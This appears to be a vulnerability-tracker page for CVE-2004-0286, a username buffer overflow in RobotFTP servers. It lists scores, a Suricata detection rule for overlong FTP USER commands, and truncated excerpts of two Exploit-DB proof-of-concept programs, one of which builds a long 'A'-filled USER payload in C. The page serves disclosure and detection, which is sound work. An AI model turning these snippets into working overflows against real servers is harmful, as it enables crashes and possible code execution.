CVE-2004-0286
published 2004-11-23CVE-2004-0286: Buffer overflow in RobotFTP 1.0 and 2.0 beta 1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long…
PriorityP336critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
8.09%
94.1th percentile
Buffer overflow in RobotFTP 1.0 and 2.0 beta 1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long username.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| robotftp | robotftp_server | — | — |
| robotftp | robotftp_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
GPL FTP USER overflow attempt
suricata·2010-09-23
CVE-1999-1510 GPL FTP USER overflow attempt
GPL FTP USER overflow attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP USER overflow attempt"; flow:established,to_server,no_stream; content:"USER|20|"; nocase; isdataat:100,relative; pcre:"/^USER\x20[^\x00\x20\x0a\x0d]{100}/smi"; reference:bugtraq,10078; reference:bugtraq,1227; reference:bugtraq,1504; reference:bugtraq,1690; reference:bugtraq,4638; reference:bugtraq,7307; reference:bugtraq,8376; reference:cve,1999-1510; reference:cve,1999-1514; reference:cve,1999-1519; reference:cve,1999-1539; reference:cve,2000-0479; reference:cve,2000-0656; reference:cve,2000-0761; reference:cve,2000-0943; reference:cve,2000-1035; reference:cve,2000-1194; reference:cve,2001-0256; reference:cve,2001-0794; reference:cve,2001-0826; reference:cve,2002-0126; reference:cve,2002-1522;
Exploit-DB
RobotFTP Server 1.0/2.0 - 'Username' Buffer Overflow (1)
exploitdb·2004-02-16
CVE-2004-0286 RobotFTP Server 1.0/2.0 - 'Username' Buffer Overflow (1)
RobotFTP Server 1.0/2.0 - 'Username' Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/9672/info
A vulnerability has been reported for RobotFTP Server. The problem likely occurs due to insufficient bounds checking when processing 'USER' command arguments of excessive length.
/******************************
this is example code for the vulnerability. It uses the windows ftp client to connect to a server
******************************/
#include
char buffer[2500];
char cmd[50];
int main(int argc, char *argv[])
{
FILE *evil;
if(argv[1] == NULL)
{
printf("Usage: %s [IP]\n\n",argv[0]);
return 0;
}
memset(buffer,0x41,47);
memcpy(buffer+47,"\r\n",2);
memcpy(buffer+49,"crash",5);
memcpy(buffer+54,"\r\n",2);
memcpy(buffer+56,"USER ",5);
memset(buffer+61,0x41,1989);
memset(
Exploit-DB
RobotFTP Server 1.0/2.0 - 'Username' Buffer Overflow (2)
exploitdb·2004-02-16
CVE-2004-0286 RobotFTP Server 1.0/2.0 - 'Username' Buffer Overflow (2)
RobotFTP Server 1.0/2.0 - 'Username' Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/9672/info
A vulnerability has been reported for RobotFTP Server. The problem likely occurs due to insufficient bounds checking when processing 'USER' command arguments of excessive length.
/*************************************************************************************************
* *
* Date: 18/2/2004 *
* Url: www.robotftp.com *
* Versions: 1.0/2.0 *
* Bug: Robotftp gets DoS'sed when an unauthorized user tries to do some command like MKD or LIST *
* Author: NoRpiUs *
* Email: [email protected] *
* Web: http://norpius.altervista.org *
* For Unix & Win *
* *
* I have done this for my birthday that is today :) - Robo-SOFT don't be angry :) *
*******************************
No writeups or analysis indexed.
2004-11-23
Published